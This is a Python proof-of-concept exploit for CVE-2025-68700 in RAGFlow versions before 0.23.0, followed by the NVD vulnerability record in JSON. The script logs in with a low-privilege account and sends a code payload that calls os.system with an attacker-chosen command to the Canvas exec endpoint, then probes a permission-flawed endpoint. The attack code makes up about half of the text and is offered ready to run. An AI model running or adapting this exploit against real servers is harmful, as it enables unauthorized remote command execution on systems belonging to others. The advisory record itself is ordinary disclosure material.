CVE-2025-68700

# CVE-2025-68700 RAGFlow RCE PoC # Target: RAGFlow < 0.23.0 # Attack Vector: Canvas CodeExec via eval() injection import requests import json TARGET = "http://target:9380" LOGIN_URL = f"{TARGET}/api/v1/login" EXEC_URL = f"{TARGET}/api/v1/canvas/exec" def exploit(target_ip, username, password, cmd="id"): """Exploit CVE-2025-68700 to achieve RCE""" session = requests.Session() # Step 1: Login with low-privilege account login_data = {"email": username, "password": password} resp = session.post(LOGIN_URL, json=login_data) if resp.status_code != 200: print(f"[-] Login failed: {resp.text}") return None print(f"[+] Logged in as {username}") # Step 2: Inject malicious code via Canvas CodeExec # The stdout is parsed by eval() without sanitization payload = f"__import__('os').system('{cmd}')" exec_data = { "code": f"print('{payload}')", "session_id": "exploit_session" } resp = session.post(EXEC_URL, json=exec_data) print(f"[*] Code execution response: {resp.text}") # Step 3: Verify RCE via /api/v1/retrieval/test_connection (inverted permissions) test_url = f"{TARGET}/api/v1/retrieval/test_connection" resp = session.get(test_url) print(f"[*] Privilege escalation check: {resp.status_code}") return resp.json() if __name__ == "__main__": import sys if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <target_ip> <username> <password> [cmd]") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] cmd = sys.argv[4] if len(sys.argv) > 4 else "id" exploit(target, user, pwd, cmd)

{"cve": {"id": "CVE-2025-68700", "sourceIdentifier": "[email protected]", "published": "2025-12-31T22:15:49.150", "lastModified": "2026-01-06T18:02:07.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In versions prior to 0.23.0, a low-privileged authenticated user (normal login account) can execute arbitrary system commands on the server host process via the frontend Canvas CodeExec component, completely bypassing sandbox isolation. This occurs because untrusted data (stdout) is parsed using eval() with no filtering or sandboxing. The intended design was to \"automatically convert string results into Python objects,\" but this effectively executes attacker-controlled code. Additional endpoints lack access control or contain inverted permission logic, significantly expanding the attack surface and enabling chained exploitation. Version 0.23.0 contains a patch for the issue."}, {"lang": "es", "value": "RAGFlow es un motor RAG (Generación Aumentada por Recuperación) de código abierto. En versiones anteriores a la 0.23.0, un usuario autenticado con bajos privilegios (cuenta de inicio de sesión normal) puede ejecutar comandos de sistema arbitrarios en el proceso del host del servidor a través del componente Canvas CodeExec del frontend, eludiendo completamente el aislamiento de la sandbox. Esto ocurre porque los datos no confiables (stdout) se analizan usando eval() sin filtrado ni sandboxing. El diseño previsto era 'convertir automáticamente los resultados de cadena en objetos Python', pero esto ejecuta efectivamente código controlado por el atacante. Los endpoints adicionales carecen de control de acceso o contienen lógica de permisos invertida, expandiendo significativamente la superficie de ataque y permitiendo la explotación encadenada. La versión 0.23.0 contiene un parche para el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:infiniflow:ragflow:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.23.0", "matchCriteriaId": "9903C77B-39CC-472C-B073-FDDF8A9B0A39"}]}]}], "references": [{"url": "https://github.com/infiniflow/ragflow/commit/7a344a32f9f83529e12ca12f40f2657eb79fe811", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/infiniflow/ragflow/security/advisories/GHSA-8xw3-v6c2-j84j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/infiniflow/ragflow/security/advisories/GHSA-8xw3-v6c2-j84j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}